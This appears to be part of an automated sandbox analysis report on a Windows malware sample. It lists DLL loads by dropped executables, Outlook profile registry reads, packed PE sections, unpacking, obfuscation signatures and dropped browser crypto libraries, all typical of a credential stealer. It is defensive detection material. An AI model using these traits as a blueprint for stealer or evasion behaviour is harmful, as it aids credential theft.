Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1811456 > 1048576
Source: file.exe Static PE information: Raw size of sgoicwpi is bigger than: 0x100000 < 0x1a0800
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2189859471.000000006C64D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2190107334.000000006C80F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: accd68d705.exe, 00000012.00000002.2663213900.0000000000982000.00000040.00000001.01000000.00000011.sdmp, accd68d705.exe, 00000012.00000003.2528804311.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe, 00000014.00000003.2622010179.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe, 00000014.00000002.2756490960.00000000002A2000.00000040.00000001.01000000.00000014.sdmp, accd68d705.exe, 00000015.00000002.2728250250.0000000000982000.00000040.00000001.01000000.00000011.sdmp, accd68d705.exe, 00000015.00000003.2687812134.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, Q10LTOCEFP0KA6N46594D.exe, 00000016.00000002.2793437431.0000000000652000.00000040.00000001.01000000.00000015.sdmp, Q10LTOCEFP0KA6N46594D.exe, 00000016.00000003.2752613172.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2189859471.000000006C64D000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.750000.0.unpack :EW;.rsrc :W;.idata :W; :EW;sgoicwpi:EW;ulryzzya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;sgoicwpi:EW;ulryzzya:EW;.taggant:EW;
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Unpacked PE file: 9.2.DocumentsIIEBKJECFC.exe.340000.0.unpack :EW;.rsrc:W;.idata :W;xbojpnva:EW;weqvlzma:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xbojpnva:EW;weqvlzma:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 10.2.skotes.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W;xbojpnva:EW;weqvlzma:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xbojpnva:EW;weqvlzma:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 11.2.skotes.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W;xbojpnva:EW;weqvlzma:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xbojpnva:EW;weqvlzma:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Unpacked PE file: 13.2.c3e1e78f6d.exe.6b0000.0.unpack :EW;.rsrc :W;.idata :W;heutirnm:EW;axktdcgc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;heutirnm:EW;axktdcgc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Unpacked PE file: 14.2.82b4c5cad2.exe.f70000.0.unpack :EW;.rsrc :W;.idata :W; :EW;sgoicwpi:EW;ulryzzya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;sgoicwpi:EW;ulryzzya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Unpacked PE file: 17.2.c3e1e78f6d.exe.6b0000.0.unpack :EW;.rsrc :W;.idata :W;heutirnm:EW;axktdcgc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;heutirnm:EW;axktdcgc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Unpacked PE file: 18.2.accd68d705.exe.980000.0.unpack :EW;.rsrc:W;.idata :W;citkblqg:EW;joxrtjxa:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Unpacked PE file: 19.2.82b4c5cad2.exe.f70000.0.unpack :EW;.rsrc :W;.idata :W; :EW;sgoicwpi:EW;ulryzzya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;sgoicwpi:EW;ulryzzya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Unpacked PE file: 20.2.70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W;citkblqg:EW;joxrtjxa:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Unpacked PE file: 21.2.accd68d705.exe.980000.0.unpack :EW;.rsrc:W;.idata :W;citkblqg:EW;joxrtjxa:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe Unpacked PE file: 22.2.Q10LTOCEFP0KA6N46594D.exe.650000.0.unpack :EW;.rsrc:W;.idata :W;citkblqg:EW;joxrtjxa:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Unpacked PE file: 23.2.c3e1e78f6d.exe.6b0000.0.unpack :EW;.rsrc :W;.idata :W;heutirnm:EW;axktdcgc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;heutirnm:EW;axktdcgc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Unpacked PE file: 24.2.82b4c5cad2.exe.f70000.0.unpack :EW;.rsrc :W;.idata :W; :EW;sgoicwpi:EW;ulryzzya:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;sgoicwpi:EW;ulryzzya:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Unpacked PE file: 25.2.accd68d705.exe.980000.0.unpack :EW;.rsrc:W;.idata :W;citkblqg:EW;joxrtjxa:EW;.taggant:EW; vs :ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C63C410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: DocumentsIIEBKJECFC.exe.0.dr Static PE information: real checksum: 0x3286e8 should be: 0x321027
Source: 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.13.dr Static PE information: real checksum: 0x2bdf34 should be: 0x2bad62
Source: Q10LTOCEFP0KA6N46594D.exe.17.dr Static PE information: real checksum: 0x2bdf34 should be: 0x2bad62
Source: file.exe Static PE information: real checksum: 0x1bec2d should be: 0x1c776f
Source: skotes.exe.9.dr Static PE information: real checksum: 0x3286e8 should be: 0x321027
Source: TMZOGPKAQROXKZACD6GWC5N6Z.exe.23.dr Static PE information: real checksum: 0x2bdf34 should be: 0x2bad62
Source: random[1].exe.0.dr Static PE information: real checksum: 0x30a1d1 should be: 0x301304
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: sgoicwpi
Source: file.exe Static PE information: section name: ulryzzya
Source: file.exe Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: DocumentsIIEBKJECFC.exe.0.dr Static PE information: section name:
Source: DocumentsIIEBKJECFC.exe.0.dr Static PE information: section name: .idata
Source: DocumentsIIEBKJECFC.exe.0.dr Static PE information: section name: xbojpnva
Source: DocumentsIIEBKJECFC.exe.0.dr Static PE information: section name: weqvlzma
Source: DocumentsIIEBKJECFC.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .rsrc
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name: heutirnm
Source: random[1].exe.0.dr Static PE information: section name: axktdcgc
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.9.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name: .idata
Source: skotes.exe.9.dr Static PE information: section name: xbojpnva
Source: skotes.exe.9.dr Static PE information: section name: weqvlzma
Source: skotes.exe.9.dr Static PE information: section name: .taggant
Source: 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.13.dr Static PE information: section name:
Source: 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.13.dr Static PE information: section name: .idata
Source: 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.13.dr Static PE information: section name: citkblqg
Source: 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.13.dr Static PE information: section name: joxrtjxa
Source: 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.13.dr Static PE information: section name: .taggant
Source: Q10LTOCEFP0KA6N46594D.exe.17.dr Static PE information: section name:
Source: Q10LTOCEFP0KA6N46594D.exe.17.dr Static PE information: section name: .idata
Source: Q10LTOCEFP0KA6N46594D.exe.17.dr Static PE information: section name: citkblqg
Source: Q10LTOCEFP0KA6N46594D.exe.17.dr Static PE information: section name: joxrtjxa
Source: Q10LTOCEFP0KA6N46594D.exe.17.dr Static PE information: section name: .taggant
Source: TMZOGPKAQROXKZACD6GWC5N6Z.exe.23.dr Static PE information: section name:
Source: TMZOGPKAQROXKZACD6GWC5N6Z.exe.23.dr Static PE information: section name: .idata
Source: TMZOGPKAQROXKZACD6GWC5N6Z.exe.23.dr Static PE information: section name: citkblqg
Source: TMZOGPKAQROXKZACD6GWC5N6Z.exe.23.dr Static PE information: section name: joxrtjxa
Source: TMZOGPKAQROXKZACD6GWC5N6Z.exe.23.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B536 push ecx; ret 0_2_6C60B549
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_0035D91C push ecx; ret 9_2_0035D92F
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Code function: 9_2_00351359 push es; ret 9_2_0035135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00E2D91C push ecx; ret 10_2_00E2D92F
Source: file.exe Static PE information: section name: sgoicwpi entropy: 7.953611979868931
Source: DocumentsIIEBKJECFC.exe.0.dr Static PE information: section name: entropy: 7.113163387400483
Source: random[1].exe.0.dr Static PE information: section name: entropy: 6.994558219696657
Source: skotes.exe.9.dr Static PE information: section name: entropy: 7.113163387400483
Source: 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe.13.dr Static PE information: section name: entropy: 7.805629855885913
Source: Q10LTOCEFP0KA6N46594D.exe.17.dr Static PE information: section name: entropy: 7.805629855885913
Source: TMZOGPKAQROXKZACD6GWC5N6Z.exe.23.dr Static PE information: section name: entropy: 7.805629855885913

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsIIEBKJECFC.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsIIEBKJECFC.exe Jump to dropped file
